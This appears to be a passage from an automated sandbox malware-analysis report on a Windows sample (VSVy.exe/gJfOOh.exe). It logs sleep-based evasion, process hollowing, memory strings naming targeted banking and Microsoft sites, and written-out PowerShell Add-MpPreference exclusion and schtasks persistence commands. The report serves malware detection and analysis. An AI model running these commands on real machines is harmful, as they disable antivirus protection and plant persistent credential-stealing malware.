              Source: C:\Users\user\AppData\Roaming\gJfOOh.exe TID: 4564Thread sleep time: -30000s >= -30000sJump to behavior
              Source: C:\Users\user\AppData\Roaming\gJfOOh.exe TID: 652Thread sleep time: -922337203685477s >= -30000sJump to behavior
              Source: C:\Users\user\AppData\Roaming\gJfOOh.exe TID: 4676Thread sleep time: -922337203685477s >= -30000s
              Source: C:\Users\user\AppData\Roaming\gJfOOh.exe TID: 4676Thread sleep time: -600000s >= -30000s
              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
              Source: C:\Users\user\Desktop\VSVy.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Users\user\Desktop\VSVy.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Users\user\Desktop\VSVy.exeThread delayed: delay time: 600000Jump to behavior
              Source: C:\Users\user\AppData\Roaming\gJfOOh.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Users\user\AppData\Roaming\gJfOOh.exeThread delayed: delay time: 922337203685477
              Source: C:\Users\user\AppData\Roaming\gJfOOh.exeThread delayed: delay time: 600000
              Source: gJfOOh.exe, 00000010.00000002.3912014380.0000000004311000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - HKVMware20,11696428655]
              Source: gJfOOh.exe, 00000010.00000002.3912014380.0000000004311000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - EU WestVMware20,11696428655n
              Source: gJfOOh.exe, 00000010.00000002.3912014380.0000000004311000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: ms.portal.azure.comVMware20,11696428655
              Source: gJfOOh.exe, 00000010.00000002.3912014380.0000000003FF2000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: interactivebrokers.co.inVMware20,11696428655d
              Source: gJfOOh.exe, 00000010.00000002.3912014380.0000000003FF2000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - COM.HKVMware20,11696428655
              Source: gJfOOh.exe, 00000010.00000002.3912014380.0000000003FF2000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: global block list test formVMware20,11696428655
              Source: gJfOOh.exe, 00000010.00000002.3912014380.0000000003FF2000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: account.microsoft.com/profileVMware20,11696428655u
              Source: gJfOOh.exe, 00000010.00000002.3912014380.0000000004311000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: global block list test formVMware20,11696428655
              Source: gJfOOh.exe, 00000010.00000002.3912014380.0000000004311000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Test URL for global passwords blocklistVMware20,11696428655
              Source: gJfOOh.exe, 00000010.00000002.3912014380.0000000003FF2000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - GDCDYNVMware20,11696428655p
              Source: gJfOOh.exe, 00000010.00000002.3912014380.0000000004311000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: secure.bankofamerica.comVMware20,11696428655|UE
              Source: gJfOOh.exe, 00000010.00000002.3912014380.0000000004311000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: microsoft.visualstudio.comVMware20,11696428655x
              Source: gJfOOh.exe, 00000010.00000002.3912014380.0000000003FF2000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: AMC password management pageVMware20,11696428655
              Source: gJfOOh.exe, 00000010.00000002.3912014380.0000000003FF2000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: tasks.office.comVMware20,11696428655o
              Source: gJfOOh.exe, 00000010.00000002.3912014380.0000000003FF2000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: interactivebrokers.comVMware20,11696428655
              Source: gJfOOh.exe, 00000010.00000002.3912014380.0000000003FF2000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: turbotax.intuit.comVMware20,11696428655t
              Source: gJfOOh.exe, 00000010.00000002.3912014380.0000000004311000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - EU East & CentralVMware20,11696428655
              Source: gJfOOh.exe, 00000010.00000002.3912014380.0000000003FF2000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696428655
              Source: gJfOOh.exe, 00000010.00000002.3900002399.0000000001036000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll=n
              Source: gJfOOh.exe, 00000010.00000002.3912014380.0000000003FF2000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - HKVMware20,11696428655]
              Source: gJfOOh.exe, 00000010.00000002.3912014380.0000000004311000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - COM.HKVMware20,11696428655
              Source: gJfOOh.exe, 00000010.00000002.3912014380.0000000004311000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: interactivebrokers.co.inVMware20,11696428655d
              Source: gJfOOh.exe, 00000010.00000002.3912014380.0000000003FF2000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: bankofamerica.comVMware20,11696428655x
              Source: gJfOOh.exe, 00000010.00000002.3912014380.0000000004311000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: netportal.hdfcbank.comVMware20,11696428655
              Source: gJfOOh.exe, 00000010.00000002.3912014380.0000000003FF2000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Test URL for global passwords blocklistVMware20,11696428655
              Source: gJfOOh.exe, 00000010.00000002.3912014380.0000000003FF2000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Transaction PasswordVMware20,11696428655x
              Source: gJfOOh.exe, 00000010.00000002.3912014380.0000000004311000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Change Transaction PasswordVMware20,11696428655
              Source: gJfOOh.exe, 00000010.00000002.3912014380.0000000003FF2000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: discord.comVMware20,11696428655f
              Source: gJfOOh.exe, 00000010.00000002.3912014380.0000000004311000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: turbotax.intuit.comVMware20,11696428655t
              Source: gJfOOh.exe, 00000010.00000002.3912014380.0000000004311000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: outlook.office365.comVMware20,11696428655t
              Source: gJfOOh.exe, 00000010.00000002.3912014380.0000000003FF2000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Transaction PasswordVMware20,11696428655}
              Source: gJfOOh.exe, 00000010.00000002.3912014380.0000000004311000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: account.microsoft.com/profileVMware20,11696428655u
              Source: gJfOOh.exe, 00000010.00000002.3912014380.0000000004311000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Transaction PasswordVMware20,11696428655}
              Source: gJfOOh.exe, 00000010.00000002.3912014380.0000000004311000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: dev.azure.comVMware20,11696428655j
              Source: gJfOOh.exe, 00000010.00000002.3912014380.0000000003FF2000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - EU East & CentralVMware20,11696428655
              Source: gJfOOh.exe, 00000010.00000002.3912014380.0000000003FF2000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Change Transaction PasswordVMware20,11696428655^
              Source: gJfOOh.exe, 00000010.00000002.3912014380.0000000004311000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: www.interactivebrokers.comVMware20,11696428655}
              Source: gJfOOh.exe, 00000010.00000002.3912014380.0000000003FF2000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: secure.bankofamerica.comVMware20,11696428655|UE
              Source: gJfOOh.exe, 00000010.00000002.3912014380.0000000003FF2000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: www.interactivebrokers.comVMware20,11696428655}
              Source: gJfOOh.exe, 00000010.00000002.3912014380.0000000003FF2000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - EU WestVMware20,11696428655n
              Source: gJfOOh.exe, 00000010.00000002.3912014380.0000000003FF2000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: outlook.office365.comVMware20,11696428655t
              Source: gJfOOh.exe, 00000010.00000002.3912014380.0000000003FF2000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: microsoft.visualstudio.comVMware20,11696428655x
              Source: VSVy.exe, 0000000A.00000002.3900170183.0000000000F66000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
              Source: gJfOOh.exe, 00000010.00000002.3912014380.0000000004311000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Transaction PasswordVMware20,11696428655x
              Source: gJfOOh.exe, 00000010.00000002.3912014380.0000000003FF2000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Change Transaction PasswordVMware20,11696428655
              Source: gJfOOh.exe, 00000010.00000002.3912014380.0000000003FF2000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: outlook.office.comVMware20,11696428655s
              Source: gJfOOh.exe, 00000010.00000002.3912014380.0000000004311000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: discord.comVMware20,11696428655f
              Source: gJfOOh.exe, 00000010.00000002.3912014380.0000000003FF2000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: www.interactivebrokers.co.inVMware20,11696428655~
              Source: gJfOOh.exe, 00000010.00000002.3912014380.0000000003FF2000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: ms.portal.azure.comVMware20,11696428655
              Source: gJfOOh.exe, 00000010.00000002.3912014380.0000000004311000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: outlook.office.comVMware20,11696428655s
              Source: gJfOOh.exe, 00000010.00000002.3912014380.0000000003FF2000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - NDCDYNVMware20,11696428655z
              Source: gJfOOh.exe, 00000010.00000002.3912014380.0000000004311000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: tasks.office.comVMware20,11696428655o
              Source: gJfOOh.exe, 00000010.00000002.3912014380.0000000003FF2000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: dev.azure.comVMware20,11696428655j
              Source: gJfOOh.exe, 00000010.00000002.3912014380.0000000003FF2000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: netportal.hdfcbank.comVMware20,11696428655
              Source: gJfOOh.exe, 00000010.00000002.3912014380.0000000004311000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Change Transaction PasswordVMware20,11696428655^
              Source: gJfOOh.exe, 00000010.00000002.3912014380.0000000004311000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: AMC password management pageVMware20,11696428655
              Source: gJfOOh.exe, 00000010.00000002.3912014380.0000000004311000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - GDCDYNVMware20,11696428655p
              Source: gJfOOh.exe, 00000010.00000002.3912014380.0000000004311000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696428655
              Source: gJfOOh.exe, 00000010.00000002.3912014380.0000000004311000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: interactivebrokers.comVMware20,11696428655
              Source: gJfOOh.exe, 00000010.00000002.3912014380.0000000004311000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: www.interactivebrokers.co.inVMware20,11696428655~
              Source: gJfOOh.exe, 00000010.00000002.3912014380.0000000004311000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: trackpan.utiitsl.comVMware20,11696428655h
              Source: gJfOOh.exe, 00000010.00000002.3912014380.0000000004311000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - NDCDYNVMware20,11696428655z
              Source: gJfOOh.exe, 00000010.00000002.3912014380.0000000003FF2000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: trackpan.utiitsl.comVMware20,11696428655h
              Source: gJfOOh.exe, 00000010.00000002.3912014380.0000000004311000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: bankofamerica.comVMware20,11696428655x
              Source: C:\Users\user\Desktop\VSVy.exeProcess information queried: ProcessInformationJump to behavior
              Source: C:\Users\user\Desktop\VSVy.exeProcess token adjusted: DebugJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
              Source: C:\Users\user\Desktop\VSVy.exeProcess token adjusted: DebugJump to behavior
              Source: C:\Users\user\Desktop\VSVy.exeMemory allocated: page read and write | page guardJump to behavior

              HIPS / PFW / Operating System Protection Evasion

              barindex
              Source: C:\Users\user\Desktop\VSVy.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\VSVy.exe"
              Source: C:\Users\user\Desktop\VSVy.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\gJfOOh.exe"
              Source: C:\Users\user\Desktop\VSVy.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\VSVy.exe"Jump to behavior
              Source: C:\Users\user\Desktop\VSVy.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\gJfOOh.exe"Jump to behavior
              Source: C:\Users\user\Desktop\VSVy.exeMemory written: C:\Users\user\Desktop\VSVy.exe base: 400000 value starts with: 4D5AJump to behavior
              Source: C:\Users\user\AppData\Roaming\gJfOOh.exeMemory written: C:\Users\user\AppData\Roaming\gJfOOh.exe base: 400000 value starts with: 4D5AJump to behavior
              Source: C:\Users\user\Desktop\VSVy.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\VSVy.exe"Jump to behavior
              Source: C:\Users\user\Desktop\VSVy.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\gJfOOh.exe"Jump to behavior
              Source: C:\Users\user\Desktop\VSVy.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\gJfOOh" /XML "C:\Users\user\AppData\Local\Temp\tmp337E.tmp"Jump to behavior
              Source: C:\Users\user\Desktop\VSVy.exeProcess created: C:\Users\user\Desktop\VSVy.exe "C:\Users\user\Desktop\VSVy.exe"Jump to behavior
              Source: C:\Users\user\AppData\Roaming\gJfOOh.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\gJfOOh" /XML "C:\Users\user\AppData\Local\Temp\tmp7F3D.tmp"Jump to behavior
              Source: C:\Users\user\AppData\Roaming\gJfOOh.exeProcess created: C:\Users\user\AppData\Roaming\gJfOOh.exe "C:\Users\user\AppData\Roaming\gJfOOh.exe"Jump to behavior
              Source: C:\Users\user\AppData\Roaming\gJfOOh.exeProcess created: C:\Users\user\AppData\Roaming\gJfOOh.exe "C:\Users\user\AppData\Roaming\gJfOOh.exe"Jump to behavior
              Source: C:\Users\user\Desktop\VSVy.exeQueries volume information: C:\Users\user\Desktop\VSVy.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\VSVy.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\VSVy.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\VSVy.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\VSVy.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\VSVy.exeQueries volume information: C:\Windows\Fonts\cour.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\VSVy.exeQueries volume information: C:\Windows\Fonts\couri.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\VSVy.exeQueries volume information: C:\Windows\Fonts\courbd.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\VSVy.exeQueries volume information: C:\Windows\Fonts\courbi.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\VSVy.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
